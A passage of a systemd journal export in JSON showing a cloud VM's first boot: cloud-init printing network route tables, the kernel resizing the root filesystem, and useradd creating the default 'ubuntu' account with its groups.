"_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 0 | 0.0.0.0 | 192.168.10.1 | 0.0.0.0 | ens3 | UG |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=265;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=de822f4a065b1b15", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 1 | 169.254.169.254 | 192.168.10.2 | 255.255.255.255 | ens3 | UGH |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=266;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=2b92ad0a201ebd9e", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 2 | 192.168.10.0 | 0.0.0.0 | 255.255.255.0 | ens3 | U |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=267;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=1829d704ad756d99", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-----------------+--------------+-----------------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=268;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=b229ce65b1002b2b", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=269;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=a45ea851a091d2cd", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-------------+---------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26a;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=7f010c225ad3867e", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | Route | Destination | Gateway | Interface | Flags |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26b;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=a45ea851a091d2cd", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-------------+---------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26c;b=e2b08827b5804427b422c10c84f1567e;m=282f7bd;t=5bd16df467724;x=793b73d8c5f739c0", "__REALTIME_TIMESTAMP" : "1615280816420644", "__MONOTONIC_TIMESTAMP" : "42137533", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 1 | fe80::/64 | :: | ens3 | U |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26d;b=e2b08827b5804427b422c10c84f1567e;m=282f7bd;t=5bd16df467724;x=2a8bc0b4a4e1dc94", "__REALTIME_TIMESTAMP" : "1615280816420644", "__MONOTONIC_TIMESTAMP" : "42137533", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 3 | local | :: | ens3 | U |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26e;b=e2b08827b5804427b422c10c84f1567e;m=282f7bd;t=5bd16df467724;x=6e95665ae5a7b346", "__REALTIME_TIMESTAMP" : "1615280816420644", "__MONOTONIC_TIMESTAMP" : "42137533", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 4 | ff00::/8 | :: | ens3 | U |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26f;b=e2b08827b5804427b422c10c84f1567e;m=282f7bd;t=5bd16df467724;x=a45ea851a091d2cd", "__REALTIME_TIMESTAMP" : "1615280816420644", "__MONOTONIC_TIMESTAMP" : "42137533", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-------------+---------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=270;b=e2b08827b5804427b422c10c84f1567e;m=28a1619;t=5bd16df4d957f;x=df409df7f70e977c", "__REALTIME_TIMESTAMP" : "1615280816887167", "__MONOTONIC_TIMESTAMP" : "42604057", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "42603851", "MESSAGE" : "EXT4-fs (vda1): resizing filesystem from 548091 to 5214459 blocks" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=271;b=e2b08827b5804427b422c10c84f1567e;m=28d13e2;t=5bd16df509348;x=ecaad3873edaaa81", "__REALTIME_TIMESTAMP" : "1615280817083208", "__MONOTONIC_TIMESTAMP" : "42800098", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "42796587", "MESSAGE" : "EXT4-fs (vda1): resized filesystem to 5214459" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=272;b=e2b08827b5804427b422c10c84f1567e;m=2904ac5;t=5bd16df53ca2c;x=c5f38dfaad45e50", "__REALTIME_TIMESTAMP" : "1615280817293868", "__MONOTONIC_TIMESTAMP" : "43010757", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "MESSAGE" : "new group: name=ubuntu, GID=1000", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817293679" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=273;b=e2b08827b5804427b422c10c84f1567e;m=29057f0;t=5bd16df53d757;x=b57edda67a1f8a7b", "__REALTIME_TIMESTAMP" : "1615280817297239", "__MONOTONIC_TIMESTAMP" : "43014128", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "new user: name=ubuntu, UID=1000, GID=1000, home=/home/ubuntu, shell=/bin/bash", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817297230" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=274;b=e2b08827b5804427b422c10c84f1567e;m=2908494;t=5bd16df5403fb;x=42b5819e6566f300", "__REALTIME_TIMESTAMP" : "1615280817308667", "__MONOTONIC_TIMESTAMP" : "43025556", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'adm'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817308652" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=275;b=e2b08827b5804427b422c10c84f1567e;m=2908559;t=5bd16df5404c1;x=9fd82976f351aa69", "__REALTIME_TIMESTAMP" : "1615280817308865", "__MONOTONIC_TIMESTAMP" : "43025753", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'dialout'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817308855" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=276;b=e2b08827b5804427b422c10c84f1567e;m=29085fd;t=5bd16df540565;x=eb66e0fb53002cec", "__REALTIME_TIMESTAMP" : "1615280817309029", "__MONOTONIC_TIMESTAMP" : "43025917", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'cdrom'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309021" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=277;b=e2b08827b5804427b422c10c84f1567e;m=2908694;t=5bd16df5405fb;x=64c01cd95089e67f", "__REALTIME_TIMESTAMP" : "1615280817309179", "__MONOTONIC_TIMESTAMP" : "43026068", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'floppy'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309172" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=278;b=e2b08827b5804427b422c10c84f1567e;m=2908715;t=5bd16df54067d;x=63b1f647f6212e20", "__REALTIME_TIMESTAMP" : "1615280817309309", "__MONOTONIC_TIMESTAMP" : "43026197", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'sudo'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309302" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=279;b=e2b08827b5804427b422c10c84f1567e;m=2908797;t=5bd16df5406ff;x=f6a00f782b9ab0be", "__REALTIME_TIMESTAMP" : "1615280817309439", "__MONOTONIC_TIMESTAMP" : "43026327", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'audio'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309432" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27a;b=e2b08827b5804427b422c10c84f1567e;m=2908835;t=5bd16df54079d;x=5ac4c98ae56706a4", "__REALTIME_TIMESTAMP" : "1615280817309597", "__MONOTONIC_TIMESTAMP" : "43026485", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'dip'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309589" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27b;b=e2b08827b5804427b422c10c84f1567e;m=29088c1;t=5bd16df540828;x=3791b49dc7fdc319", "__REALTIME_TIMESTAMP" : "1615280817309736", "__MONOTONIC_TIMESTAMP" : "43026625", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'video'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309729" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27c;b=e2b08827b5804427b422c10c84f1567e;m=2908946;t=5bd16df5408ad;x=f662af4b76fbe91a", "__REALTIME_TIMESTAMP" : "1615280817309869", "__MONOTONIC_TIMESTAMP" : "43026758", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", 